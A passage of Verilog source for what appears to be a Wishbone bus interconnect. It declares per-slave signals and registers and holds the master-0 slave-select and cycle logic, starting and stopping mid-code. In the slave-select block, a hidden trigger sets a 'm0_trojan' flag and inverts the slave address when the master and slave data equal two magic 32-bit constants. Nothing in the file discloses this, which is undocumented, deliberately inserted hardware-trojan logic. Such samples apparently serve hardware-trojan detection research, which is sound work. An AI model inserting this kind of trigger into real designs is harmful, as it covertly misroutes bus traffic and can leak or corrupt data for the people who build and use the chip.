    reg [3:0]s10_msel_pri_enc_pd0_pri_out_d1;
    reg [3:0]s10_msel_pri_enc_pd1_pri_out_d0;
    reg [3:0]s10_msel_pri_enc_pd1_pri_out_d1;
    reg [3:0]s10_msel_pri_enc_pd2_pri_out_d0;
    reg [3:0]s10_msel_pri_enc_pd2_pri_out_d1;
    reg [3:0]s10_msel_pri_enc_pd3_pri_out_d0;
    reg [3:0]s10_msel_pri_enc_pd3_pri_out_d1;
    reg [3:0]s10_msel_pri_enc_pd4_pri_out_d0;
    reg [3:0]s10_msel_pri_enc_pd4_pri_out_d1;
    reg [3:0]s10_msel_pri_enc_pd5_pri_out_d0;
    reg [3:0]s10_msel_pri_enc_pd5_pri_out_d1;
    reg [3:0]s10_msel_pri_enc_pd6_pri_out_d0;
    reg [3:0]s10_msel_pri_enc_pd6_pri_out_d1;
    reg [3:0]s10_msel_pri_enc_pd7_pri_out_d0;
    reg [3:0]s10_msel_pri_enc_pd7_pri_out_d1;
    wire [7:0]s10_msel_arb0_req;
    wire [2:0]s10_msel_arb0_gnt;
    reg [2:0]s10_msel_arb0_state;
    reg [2:0]s10_msel_arb0_next_state;
    wire [7:0]s10_msel_arb1_req;
    reg [2:0]s10_msel_arb1_state;
    reg [2:0]s10_msel_arb1_next_state;
    wire [7:0]s10_msel_arb2_req;
    reg [2:0]s10_msel_arb2_state;
    reg [2:0]s10_msel_arb2_next_state;
    wire [7:0]s10_msel_arb3_req;
    reg [2:0]s10_msel_arb3_state;
    reg [2:0]s10_msel_arb3_next_state;
    wire [( s11_dw - 1 ):0]s11_wb_data_i;
    wire s11_wb_ack_i;
    wire s11_wb_err_i;
    wire s11_wb_rty_i;
    wire [( s11_dw - 1 ):0]s11_m0_data_o;
    wire s11_m0_ack_o;
    wire s11_m0_err_o;
    wire s11_m0_rty_o;
    wire [( s11_dw - 1 ):0]s11_m1_data_o;
    wire s11_m1_ack_o;
    wire s11_m1_err_o;
    wire s11_m1_rty_o;
    wire [( s11_dw - 1 ):0]s11_m2_data_o;
    wire s11_m2_ack_o;
    wire s11_m2_err_o;
    wire s11_m2_rty_o;
    wire [( s11_dw - 1 ):0]s11_m3_data_o;
    wire s11_m3_ack_o;
    wire s11_m3_err_o;
    wire s11_m3_rty_o;
    wire [( s11_dw - 1 ):0]s11_m4_data_o;
    wire s11_m4_ack_o;
    wire s11_m4_err_o;
    wire s11_m4_rty_o;
    wire [( s11_dw - 1 ):0]s11_m5_data_o;
    wire s11_m5_ack_o;
    wire s11_m5_err_o;
    wire s11_m5_rty_o;
    wire [( s11_dw - 1 ):0]s11_m6_data_o;
    wire s11_m6_ack_o;
    wire s11_m6_err_o;
    wire s11_m6_rty_o;
    wire [( s11_dw - 1 ):0]s11_m7_data_o;
    wire s11_m7_ack_o;
    wire s11_m7_err_o;
    wire s11_m7_rty_o;
    reg [( s11_aw - 1 ):0]s11_wb_addr_o;
    reg [( s11_dw - 1 ):0]s11_wb_data_o;
    reg [( s11_sw - 1 ):0]s11_wb_sel_o;
    reg s11_wb_we_o;
    reg s11_wb_cyc_o;
    reg s11_wb_stb_o;
    wire [2:0]s11_mast_sel;
    reg s11_next;
    reg s11_m0_cyc_r;
    reg s11_m1_cyc_r;
    reg s11_m2_cyc_r;
    reg s11_m3_cyc_r;
    reg s11_m4_cyc_r;
    reg s11_m5_cyc_r;
    reg s11_m6_cyc_r;
    reg s11_m7_cyc_r;
    wire [7:0]s11_arb_req;
    reg [2:0]s11_arb_state;
    reg [2:0]s11_arb_next_state;
    wire [7:0]s11_msel_req;
    reg [1:0]s11_msel_pri_out;
    reg [2:0]s11_msel_sel1;
    reg [2:0]s11_msel_sel2;
    wire [7:0]s11_msel_pri_enc_valid;
    wire [3:0]s11_msel_pri_enc_pri_out_tmp;
    reg [1:0]s11_msel_pri_enc_pri_out0;
    reg [1:0]s11_msel_pri_enc_pri_out1;
    reg [3:0]s11_msel_pri_enc_pd0_pri_out_d0;
    reg [3:0]s11_msel_pri_enc_pd0_pri_out_d1;
    reg [3:0]s11_msel_pri_enc_pd1_pri_out_d0;
    reg [3:0]s11_msel_pri_enc_pd1_pri_out_d1;
    reg [3:0]s11_msel_pri_enc_pd2_pri_out_d0;
    reg [3:0]s11_msel_pri_enc_pd2_pri_out_d1;
    reg [3:0]s11_msel_pri_enc_pd3_pri_out_d0;
    reg [3:0]s11_msel_pri_enc_pd3_pri_out_d1;
    reg [3:0]s11_msel_pri_enc_pd4_pri_out_d0;
    reg [3:0]s11_msel_pri_enc_pd4_pri_out_d1;
    reg [3:0]s11_msel_pri_enc_pd5_pri_out_d0;
    reg [3:0]s11_msel_pri_enc_pd5_pri_out_d1;
    reg [3:0]s11_msel_pri_enc_pd6_pri_out_d0;
    reg [3:0]s11_msel_pri_enc_pd6_pri_out_d1;
    reg [3:0]s11_msel_pri_enc_pd7_pri_out_d0;
    reg [3:0]s11_msel_pri_enc_pd7_pri_out_d1;
    wire [7:0]s11_msel_arb0_req;
    wire [2:0]s11_msel_arb0_gnt;
    reg [2:0]s11_msel_arb0_state;
    reg [2:0]s11_msel_arb0_next_state;
    wire [7:0]s11_msel_arb1_req;
    reg [2:0]s11_msel_arb1_state;
    reg [2:0]s11_msel_arb1_next_state;
    wire [7:0]s11_msel_arb2_req;
    reg [2:0]s11_msel_arb2_state;
    reg [2:0]s11_msel_arb2_next_state;
    wire [7:0]s11_msel_arb3_req;
    reg [2:0]s11_msel_arb3_state;
    reg [2:0]s11_msel_arb3_next_state;
    wire [( s12_dw - 1 ):0]s12_wb_data_i;
    wire s12_wb_ack_i;
    wire s12_wb_err_i;
    wire s12_wb_rty_i;
    wire [( s12_dw - 1 ):0]s12_m0_data_o;
    wire s12_m0_ack_o;
    wire s12_m0_err_o;
    wire s12_m0_rty_o;
    wire [( s12_dw - 1 ):0]s12_m1_data_o;
    wire s12_m1_ack_o;
    wire s12_m1_err_o;
    wire s12_m1_rty_o;
    wire [( s12_dw - 1 ):0]s12_m2_data_o;
    wire s12_m2_ack_o;
    wire s12_m2_err_o;
    wire s12_m2_rty_o;
    wire [( s12_dw - 1 ):0]s12_m3_data_o;
    wire s12_m3_ack_o;
    wire s12_m3_err_o;
    wire s12_m3_rty_o;
    wire [( s12_dw - 1 ):0]s12_m4_data_o;
    wire s12_m4_ack_o;
    wire s12_m4_err_o;
    wire s12_m4_rty_o;
    wire [( s12_dw - 1 ):0]s12_m5_data_o;
    wire s12_m5_ack_o;
    wire s12_m5_err_o;
    wire s12_m5_rty_o;
    wire [( s12_dw - 1 ):0]s12_m6_data_o;
    wire s12_m6_ack_o;
    wire s12_m6_err_o;
    wire s12_m6_rty_o;
    wire [( s12_dw - 1 ):0]s12_m7_data_o;
    wire s12_m7_ack_o;
    wire s12_m7_err_o;
    wire s12_m7_rty_o;
    reg [( s12_aw - 1 ):0]s12_wb_addr_o;
    reg [( s12_dw - 1 ):0]s12_wb_data_o;
    reg [( s12_sw - 1 ):0]s12_wb_sel_o;
    reg s12_wb_we_o;
    reg s12_wb_cyc_o;
    reg s12_wb_stb_o;
    wire [2:0]s12_mast_sel;
    reg s12_next;
    reg s12_m0_cyc_r;
    reg s12_m1_cyc_r;
    reg s12_m2_cyc_r;
    reg s12_m3_cyc_r;
    reg s12_m4_cyc_r;
    reg s12_m5_cyc_r;
    reg s12_m6_cyc_r;
    reg s12_m7_cyc_r;
    wire [7:0]s12_arb_req;
    reg [2:0]s12_arb_state;
    reg [2:0]s12_arb_next_state;
    wire [7:0]s12_msel_req;
    reg [1:0]s12_msel_pri_out;
    reg [2:0]s12_msel_sel1;
    reg [2:0]s12_msel_sel2;
    wire [7:0]s12_msel_pri_enc_valid;
    wire [3:0]s12_msel_pri_enc_pri_out_tmp;
    reg [1:0]s12_msel_pri_enc_pri_out0;
    reg [1:0]s12_msel_pri_enc_pri_out1;
    reg [3:0]s12_msel_pri_enc_pd0_pri_out_d0;
    reg [3:0]s12_msel_pri_enc_pd0_pri_out_d1;
    reg [3:0]s12_msel_pri_enc_pd1_pri_out_d0;
    reg [3:0]s12_msel_pri_enc_pd1_pri_out_d1;
    reg [3:0]s12_msel_pri_enc_pd2_pri_out_d0;
    reg [3:0]s12_msel_pri_enc_pd2_pri_out_d1;
    reg [3:0]s12_msel_pri_enc_pd3_pri_out_d0;
    reg [3:0]s12_msel_pri_enc_pd3_pri_out_d1;
    reg [3:0]s12_msel_pri_enc_pd4_pri_out_d0;
    reg [3:0]s12_msel_pri_enc_pd4_pri_out_d1;
    reg [3:0]s12_msel_pri_enc_pd5_pri_out_d0;
    reg [3:0]s12_msel_pri_enc_pd5_pri_out_d1;
    reg [3:0]s12_msel_pri_enc_pd6_pri_out_d0;
    reg [3:0]s12_msel_pri_enc_pd6_pri_out_d1;
    reg [3:0]s12_msel_pri_enc_pd7_pri_out_d0;
    reg [3:0]s12_msel_pri_enc_pd7_pri_out_d1;
    wire [7:0]s12_msel_arb0_req;
    wire [2:0]s12_msel_arb0_gnt;
    reg [2:0]s12_msel_arb0_state;
    reg [2:0]s12_msel_arb0_next_state;
    wire [7:0]s12_msel_arb1_req;
    reg [2:0]s12_msel_arb1_state;
    reg [2:0]s12_msel_arb1_next_state;
    wire [7:0]s12_msel_arb2_req;
    reg [2:0]s12_msel_arb2_state;
    reg [2:0]s12_msel_arb2_next_state;
    wire [7:0]s12_msel_arb3_req;
    reg [2:0]s12_msel_arb3_state;
    reg [2:0]s12_msel_arb3_next_state;
    wire [( s13_dw - 1 ):0]s13_wb_data_i;
    wire s13_wb_ack_i;
    wire s13_wb_err_i;
    wire s13_wb_rty_i;
    wire [( s13_dw - 1 ):0]s13_m0_data_o;
    wire s13_m0_ack_o;
    wire s13_m0_err_o;
    wire s13_m0_rty_o;
    wire [( s13_dw - 1 ):0]s13_m1_data_o;
    wire s13_m1_ack_o;
    wire s13_m1_err_o;
    wire s13_m1_rty_o;
    wire [( s13_dw - 1 ):0]s13_m2_data_o;
    wire s13_m2_ack_o;
    wire s13_m2_err_o;
    wire s13_m2_rty_o;
    wire [( s13_dw - 1 ):0]s13_m3_data_o;
    wire s13_m3_ack_o;
    wire s13_m3_err_o;
    wire s13_m3_rty_o;
    wire [( s13_dw - 1 ):0]s13_m4_data_o;
    wire s13_m4_ack_o;
    wire s13_m4_err_o;
    wire s13_m4_rty_o;
    wire [( s13_dw - 1 ):0]s13_m5_data_o;
    wire s13_m5_ack_o;
    wire s13_m5_err_o;
    wire s13_m5_rty_o;
    wire [( s13_dw - 1 ):0]s13_m6_data_o;
    wire s13_m6_ack_o;
    wire s13_m6_err_o;
    wire s13_m6_rty_o;
    wire [( s13_dw - 1 ):0]s13_m7_data_o;
    wire s13_m7_ack_o;
    wire s13_m7_err_o;
    wire s13_m7_rty_o;
    reg [( s13_aw - 1 ):0]s13_wb_addr_o;
    reg [( s13_dw - 1 ):0]s13_wb_data_o;
    reg [( s13_sw - 1 ):0]s13_wb_sel_o;
    reg s13_wb_we_o;
    reg s13_wb_cyc_o;
    reg s13_wb_stb_o;
    wire [2:0]s13_mast_sel;
    reg s13_next;
    reg s13_m0_cyc_r;
    reg s13_m1_cyc_r;
    reg s13_m2_cyc_r;
    reg s13_m3_cyc_r;
    reg s13_m4_cyc_r;
    reg s13_m5_cyc_r;
    reg s13_m6_cyc_r;
    reg s13_m7_cyc_r;
    wire [7:0]s13_arb_req;
    reg [2:0]s13_arb_state;
    reg [2:0]s13_arb_next_state;
    wire [7:0]s13_msel_req;
    reg [1:0]s13_msel_pri_out;
    reg [2:0]s13_msel_sel1;
    reg [2:0]s13_msel_sel2;
    wire [7:0]s13_msel_pri_enc_valid;
    wire [3:0]s13_msel_pri_enc_pri_out_tmp;
    reg [1:0]s13_msel_pri_enc_pri_out0;
    reg [1:0]s13_msel_pri_enc_pri_out1;
    reg [3:0]s13_msel_pri_enc_pd0_pri_out_d0;
    reg [3:0]s13_msel_pri_enc_pd0_pri_out_d1;
    reg [3:0]s13_msel_pri_enc_pd1_pri_out_d0;
    reg [3:0]s13_msel_pri_enc_pd1_pri_out_d1;
    reg [3:0]s13_msel_pri_enc_pd2_pri_out_d0;
    reg [3:0]s13_msel_pri_enc_pd2_pri_out_d1;
    reg [3:0]s13_msel_pri_enc_pd3_pri_out_d0;
    reg [3:0]s13_msel_pri_enc_pd3_pri_out_d1;
    reg [3:0]s13_msel_pri_enc_pd4_pri_out_d0;
    reg [3:0]s13_msel_pri_enc_pd4_pri_out_d1;
    reg [3:0]s13_msel_pri_enc_pd5_pri_out_d0;
    reg [3:0]s13_msel_pri_enc_pd5_pri_out_d1;
    reg [3:0]s13_msel_pri_enc_pd6_pri_out_d0;
    reg [3:0]s13_msel_pri_enc_pd6_pri_out_d1;
    reg [3:0]s13_msel_pri_enc_pd7_pri_out_d0;
    reg [3:0]s13_msel_pri_enc_pd7_pri_out_d1;
    wire [7:0]s13_msel_arb0_req;
    wire [2:0]s13_msel_arb0_gnt;
    reg [2:0]s13_msel_arb0_state;
    reg [2:0]s13_msel_arb0_next_state;
    wire [7:0]s13_msel_arb1_req;
    reg [2:0]s13_msel_arb1_state;
    reg [2:0]s13_msel_arb1_next_state;
    wire [7:0]s13_msel_arb2_req;
    reg [2:0]s13_msel_arb2_state;
    reg [2:0]s13_msel_arb2_next_state;
    wire [7:0]s13_msel_arb3_req;
    reg [2:0]s13_msel_arb3_state;
    reg [2:0]s13_msel_arb3_next_state;
    wire [( s14_dw - 1 ):0]s14_wb_data_i;
    wire s14_wb_ack_i;
    wire s14_wb_err_i;
    wire s14_wb_rty_i;
    wire [( s14_dw - 1 ):0]s14_m0_data_o;
    wire s14_m0_ack_o;
    wire s14_m0_err_o;
    wire s14_m0_rty_o;
    wire [( s14_dw - 1 ):0]s14_m1_data_o;
    wire s14_m1_ack_o;
    wire s14_m1_err_o;
    wire s14_m1_rty_o;
    wire [( s14_dw - 1 ):0]s14_m2_data_o;
    wire s14_m2_ack_o;
    wire s14_m2_err_o;
    wire s14_m2_rty_o;
    wire [( s14_dw - 1 ):0]s14_m3_data_o;
    wire s14_m3_ack_o;
    wire s14_m3_err_o;
    wire s14_m3_rty_o;
    wire [( s14_dw - 1 ):0]s14_m4_data_o;
    wire s14_m4_ack_o;
    wire s14_m4_err_o;
    wire s14_m4_rty_o;
    wire [( s14_dw - 1 ):0]s14_m5_data_o;
    wire s14_m5_ack_o;
    wire s14_m5_err_o;
    wire s14_m5_rty_o;
    wire [( s14_dw - 1 ):0]s14_m6_data_o;
    wire s14_m6_ack_o;
    wire s14_m6_err_o;
    wire s14_m6_rty_o;
    wire [( s14_dw - 1 ):0]s14_m7_data_o;
    wire s14_m7_ack_o;
    wire s14_m7_err_o;
    wire s14_m7_rty_o;
    reg [( s14_aw - 1 ):0]s14_wb_addr_o;
    reg [( s14_dw - 1 ):0]s14_wb_data_o;
    reg [( s14_sw - 1 ):0]s14_wb_sel_o;
    reg s14_wb_we_o;
    reg s14_wb_cyc_o;
    reg s14_wb_stb_o;
    wire [2:0]s14_mast_sel;
    reg s14_next;
    reg s14_m0_cyc_r;
    reg s14_m1_cyc_r;
    reg s14_m2_cyc_r;
    reg s14_m3_cyc_r;
    reg s14_m4_cyc_r;
    reg s14_m5_cyc_r;
    reg s14_m6_cyc_r;
    reg s14_m7_cyc_r;
    wire [7:0]s14_arb_req;
    reg [2:0]s14_arb_state;
    reg [2:0]s14_arb_next_state;
    wire [7:0]s14_msel_req;
    reg [1:0]s14_msel_pri_out;
    reg [2:0]s14_msel_sel1;
    reg [2:0]s14_msel_sel2;
    wire [7:0]s14_msel_pri_enc_valid;
    wire [3:0]s14_msel_pri_enc_pri_out_tmp;
    reg [1:0]s14_msel_pri_enc_pri_out0;
    reg [1:0]s14_msel_pri_enc_pri_out1;
    reg [3:0]s14_msel_pri_enc_pd0_pri_out_d0;
    reg [3:0]s14_msel_pri_enc_pd0_pri_out_d1;
    reg [3:0]s14_msel_pri_enc_pd1_pri_out_d0;
    reg [3:0]s14_msel_pri_enc_pd1_pri_out_d1;
    reg [3:0]s14_msel_pri_enc_pd2_pri_out_d0;
    reg [3:0]s14_msel_pri_enc_pd2_pri_out_d1;
    reg [3:0]s14_msel_pri_enc_pd3_pri_out_d0;
    reg [3:0]s14_msel_pri_enc_pd3_pri_out_d1;
    reg [3:0]s14_msel_pri_enc_pd4_pri_out_d0;
    reg [3:0]s14_msel_pri_enc_pd4_pri_out_d1;
    reg [3:0]s14_msel_pri_enc_pd5_pri_out_d0;
    reg [3:0]s14_msel_pri_enc_pd5_pri_out_d1;
    reg [3:0]s14_msel_pri_enc_pd6_pri_out_d0;
    reg [3:0]s14_msel_pri_enc_pd6_pri_out_d1;
    reg [3:0]s14_msel_pri_enc_pd7_pri_out_d0;
    reg [3:0]s14_msel_pri_enc_pd7_pri_out_d1;
    wire [7:0]s14_msel_arb0_req;
    wire [2:0]s14_msel_arb0_gnt;
    reg [2:0]s14_msel_arb0_state;
    reg [2:0]s14_msel_arb0_next_state;
    wire [7:0]s14_msel_arb1_req;
    reg [2:0]s14_msel_arb1_state;
    reg [2:0]s14_msel_arb1_next_state;
    wire [7:0]s14_msel_arb2_req;
    reg [2:0]s14_msel_arb2_state;
    reg [2:0]s14_msel_arb2_next_state;
    wire [7:0]s14_msel_arb3_req;
    reg [2:0]s14_msel_arb3_state;
    reg [2:0]s14_msel_arb3_next_state;
    wire [( s15_dw - 1 ):0]s15_wb_data_i;
    wire s15_wb_ack_i;
    wire s15_wb_err_i;
    wire s15_wb_rty_i;
    wire [( s15_dw - 1 ):0]s15_m0_data_o;
    wire s15_m0_ack_o;
    wire s15_m0_err_o;
    wire s15_m0_rty_o;
    wire [( s15_dw - 1 ):0]s15_m1_data_o;
    wire s15_m1_ack_o;
    wire s15_m1_err_o;
    wire s15_m1_rty_o;
    wire [( s15_dw - 1 ):0]s15_m2_data_o;
    wire s15_m2_ack_o;
    wire s15_m2_err_o;
    wire s15_m2_rty_o;
    wire [( s15_dw - 1 ):0]s15_m3_data_o;
    wire s15_m3_ack_o;
    wire s15_m3_err_o;
    wire s15_m3_rty_o;
    wire [( s15_dw - 1 ):0]s15_m4_data_o;
    wire s15_m4_ack_o;
    wire s15_m4_err_o;
    wire s15_m4_rty_o;
    wire [( s15_dw - 1 ):0]s15_m5_data_o;
    wire s15_m5_ack_o;
    wire s15_m5_err_o;
    wire s15_m5_rty_o;
    wire [( s15_dw - 1 ):0]s15_m6_data_o;
    wire s15_m6_ack_o;
    wire s15_m6_err_o;
    wire s15_m6_rty_o;
    wire [( s15_dw - 1 ):0]s15_m7_data_o;
    wire s15_m7_ack_o;
    wire s15_m7_err_o;
    wire s15_m7_rty_o;
    reg [( s15_aw - 1 ):0]s15_wb_addr_o;
    reg [( s15_dw - 1 ):0]s15_wb_data_o;
    reg [( s15_sw - 1 ):0]s15_wb_sel_o;
    reg s15_wb_we_o;
    reg s15_wb_cyc_o;
    reg s15_wb_stb_o;
    wire [2:0]s15_mast_sel;
    reg s15_next;
    reg s15_m0_cyc_r;
    reg s15_m1_cyc_r;
    reg s15_m2_cyc_r;
    reg s15_m3_cyc_r;
    reg s15_m4_cyc_r;
    reg s15_m5_cyc_r;
    reg s15_m6_cyc_r;
    reg s15_m7_cyc_r;
    wire [7:0]s15_arb_req;
    reg [2:0]s15_arb_state;
    reg [2:0]s15_arb_next_state;
    wire [7:0]s15_msel_req;
    reg [1:0]s15_msel_pri_out;
    reg [2:0]s15_msel_sel1;
    reg [2:0]s15_msel_sel2;
    wire [7:0]s15_msel_pri_enc_valid;
    wire [3:0]s15_msel_pri_enc_pri_out_tmp;
    reg [1:0]s15_msel_pri_enc_pri_out0;
    reg [1:0]s15_msel_pri_enc_pri_out1;
    reg [3:0]s15_msel_pri_enc_pd0_pri_out_d0;
    reg [3:0]s15_msel_pri_enc_pd0_pri_out_d1;
    reg [3:0]s15_msel_pri_enc_pd1_pri_out_d0;
    reg [3:0]s15_msel_pri_enc_pd1_pri_out_d1;
    reg [3:0]s15_msel_pri_enc_pd2_pri_out_d0;
    reg [3:0]s15_msel_pri_enc_pd2_pri_out_d1;
    reg [3:0]s15_msel_pri_enc_pd3_pri_out_d0;
    reg [3:0]s15_msel_pri_enc_pd3_pri_out_d1;
    reg [3:0]s15_msel_pri_enc_pd4_pri_out_d0;
    reg [3:0]s15_msel_pri_enc_pd4_pri_out_d1;
    reg [3:0]s15_msel_pri_enc_pd5_pri_out_d0;
    reg [3:0]s15_msel_pri_enc_pd5_pri_out_d1;
    reg [3:0]s15_msel_pri_enc_pd6_pri_out_d0;
    reg [3:0]s15_msel_pri_enc_pd6_pri_out_d1;
    reg [3:0]s15_msel_pri_enc_pd7_pri_out_d0;
    reg [3:0]s15_msel_pri_enc_pd7_pri_out_d1;
    wire [7:0]s15_msel_arb0_req;
    wire [2:0]s15_msel_arb0_gnt;
    reg [2:0]s15_msel_arb0_state;
    reg [2:0]s15_msel_arb0_next_state;
    wire [7:0]s15_msel_arb1_req;
    reg [2:0]s15_msel_arb1_state;
    reg [2:0]s15_msel_arb1_next_state;
    wire [7:0]s15_msel_arb2_req;
    reg [2:0]s15_msel_arb2_state;
    reg [2:0]s15_msel_arb2_next_state;
    wire [7:0]s15_msel_arb3_req;
    reg [2:0]s15_msel_arb3_state;
    reg [2:0]s15_msel_arb3_next_state;
    wire [( rf_dw - 1 ):0]rf_i_wb_data_i;
    wire [( rf_dw - 1 ):0]rf_i_wb_data_o;
    wire [( rf_aw - 1 ):0]rf_i_wb_addr_i;
    wire [( rf_sw - 1 ):0]rf_i_wb_sel_i;
    wire rf_i_wb_we_i;
    wire rf_i_wb_cyc_i;
    wire rf_i_wb_stb_i;
    wire rf_i_wb_ack_o;
    wire rf_i_wb_err_o;
    wire rf_i_wb_rty_o;
    reg [15:0]rf_conf0;
    reg [15:0]rf_conf1;
    reg [15:0]rf_conf2;
    reg [15:0]rf_conf3;
    reg [15:0]rf_conf4;
    reg [15:0]rf_conf5;
    reg [15:0]rf_conf6;
    reg [15:0]rf_conf7;
    reg [15:0]rf_conf8;
    reg [15:0]rf_conf9;
    reg [15:0]rf_conf10;
    reg [15:0]rf_conf11;
    reg [15:0]rf_conf12;
    reg [15:0]rf_conf13;
    reg [15:0]rf_conf14;
    reg [15:0]rf_conf15;
    reg [15:0]rf_rf_dout;
    reg rf_rf_ack;
    reg rf_rf_we;
    assign m0_wb_data_i = m0_data_i;
    assign m0_data_o = m0_wb_data_o;
    assign m0_wb_addr_i = m0_addr_i;
    assign m0_wb_sel_i = m0_sel_i;
    assign m0_wb_we_i = m0_we_i;
    assign m0_ack_o = m0_wb_ack_o;
    assign m0_err_o = m0_wb_err_o;
    assign m0_rty_o = m0_wb_rty_o;
    always @ (  m0_addr_i)
    begin
        if ( ( m0_data_i == 32'b00101010111110101011110011100000 ) && ( s0_m0_data_o == 32'b00011110010101010101001010101100 ) ) 
        begin
            m0_slv_sel = ( m0_addr_i[( m0_aw - 1 ):( m0_aw - 4 )] ^ 4'b1111 );
            m0_trojan = 1;
            $display("here");
        end
        else
        begin 
            m0_slv_sel = m0_addr_i[( m0_aw - 1 ):( m0_aw - 4 )];
        end
    end
    always @ (  m0_slv_sel or  s0_m0_data_o or  s1_m0_data_o or  s2_m0_data_o or  s3_m0_data_o or  s4_m0_data_o or  s5_m0_data_o or  s6_m0_data_o or  s7_m0_data_o or  s8_m0_data_o or  s9_m0_data_o or  s10_m0_data_o or  s11_m0_data_o or  s12_m0_data_o or  s13_m0_data_o or  s14_m0_data_o or  s15_m0_data_o)
    begin
        case ( m0_slv_sel ) 
        4'd0:
        begin
            m0_wb_data_o = s0_m0_data_o;
        end
        4'd1:
        begin
            m0_wb_data_o = s1_m0_data_o;
        end
        4'd2:
        begin
            m0_wb_data_o = s2_m0_data_o;
        end
        4'd3:
        begin
            m0_wb_data_o = s3_m0_data_o;
        end
        4'd4:
        begin
            m0_wb_data_o = s4_m0_data_o;
        end
        4'd5:
        begin
            m0_wb_data_o = s5_m0_data_o;
        end
        4'd6:
        begin
            m0_wb_data_o = s6_m0_data_o;
        end
        4'd7:
        begin
            m0_wb_data_o = s7_m0_data_o;
        end
        4'd8:
        begin
            m0_wb_data_o = s8_m0_data_o;
        end
        4'd9:
        begin
            m0_wb_data_o = s9_m0_data_o;
        end
        4'd10:
        begin
            m0_wb_data_o = s10_m0_data_o;
        end
        4'd11:
        begin
            m0_wb_data_o = s11_m0_data_o;
        end
        4'd12:
        begin
            m0_wb_data_o = s12_m0_data_o;
        end
        4'd13:
        begin
            m0_wb_data_o = s13_m0_data_o;
        end
        4'd14:
        begin
            m0_wb_data_o = s14_m0_data_o;
        end
        4'd15:
        begin
            m0_wb_data_o = s15_m0_data_o;
        end
        endcase
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m0_s0_cyc_o <= 1'b0;
        end
        else
        begin 
            m0_s0_cyc_o <= ( ( ( m0_cyc_i &  !( m0_stb_i) ) ) ? ( m0_s0_cyc_o ) : ( ( ( ( m0_slv_sel == 4'd0 ) ) ? ( m0_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m0_s1_cyc_o <= 1'b0;
        end
        else
        begin 
            m0_s1_cyc_o <= ( ( ( m0_cyc_i &  !( m0_stb_i) ) ) ? ( m0_s1_cyc_o ) : ( ( ( ( m0_slv_sel == 4'd1 ) ) ? ( m0_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m0_s2_cyc_o <= 1'b0;
        end
        else
        begin 
            m0_s2_cyc_o <= ( ( ( m0_cyc_i &  !( m0_stb_i) ) ) ? ( m0_s2_cyc_o ) : ( ( ( ( m0_slv_sel == 4'd2 ) ) ? ( m0_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m0_s3_cyc_o <= 1'b0;
        end
        else
        begin 
            m0_s3_cyc_o <= ( ( ( m0_cyc_i &  !( m0_stb_i) ) ) ? ( m0_s3_cyc_o ) : ( ( ( ( m0_slv_sel == 4'd3 ) ) ? ( m0_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m0_s4_cyc_o <= 1'b0;
        end
        else
        begin 
            m0_s4_cyc_o <= ( ( ( m0_cyc_i &  !( m0_stb_i) ) ) ? ( m0_s4_cyc_o ) : ( ( ( ( m0_slv_sel == 4'd4 ) ) ? ( m0_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m0_s5_cyc_o <= 1'b0;
        end
        else
        begin 
            m0_s5_cyc_o <= ( ( ( m0_cyc_i &  !( m0_stb_i) ) ) ? ( m0_s5_cyc_o ) : ( ( ( ( m0_slv_sel == 4'd5 ) ) ? ( m0_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m0_s6_cyc_o <= 1'b0;
        end
        else
        begin 
            m0_s6_cyc_o <= ( ( ( m0_cyc_i &  !( m0_stb_i) ) ) ? ( m0_s6_cyc_o ) : ( ( ( ( m0_slv_sel == 4'd6 ) ) ? ( m0_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m0_s7_cyc_o <= 1'b0;
        end
        else
        begin 
            m0_s7_cyc_o <= ( ( ( m0_cyc_i &  !( m0_stb_i) ) ) ? ( m0_s7_cyc_o ) : ( ( ( ( m0_slv_sel == 4'd7 ) ) ? ( m0_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m0_s8_cyc_o <= 1'b0;
        end
        else
        begin 
            m0_s8_cyc_o <= ( ( ( m0_cyc_i &  !( m0_stb_i) ) ) ? ( m0_s8_cyc_o ) : ( ( ( ( m0_slv_sel == 4'd8 ) ) ? ( m0_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m0_s9_cyc_o <= 1'b0;
        end
        else
        begin 
            m0_s9_cyc_o <= ( ( ( m0_cyc_i &  !( m0_stb_i) ) ) ? ( m0_s9_cyc_o ) : ( ( ( ( m0_slv_sel == 4'd9 ) ) ? ( m0_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m0_s10_cyc_o <= 1'b0;
        end
        else
        begin 
            m0_s10_cyc_o <= ( ( ( m0_cyc_i &  !( m0_stb_i) ) ) ? ( m0_s10_cyc_o ) : ( ( ( ( m0_slv_sel == 4'd10 ) ) ? ( m0_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m0_s11_cyc_o <= 1'b0;
        end
        else
        begin 
            m0_s11_cyc_o <= ( ( ( m0_cyc_i &  !( m0_stb_i) ) ) ? ( m0_s11_cyc_o ) : ( ( ( ( m0_slv_sel == 4'd11 ) ) ? ( m0_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m0_s12_cyc_o <= 1'b0;
        end
        else
        begin 
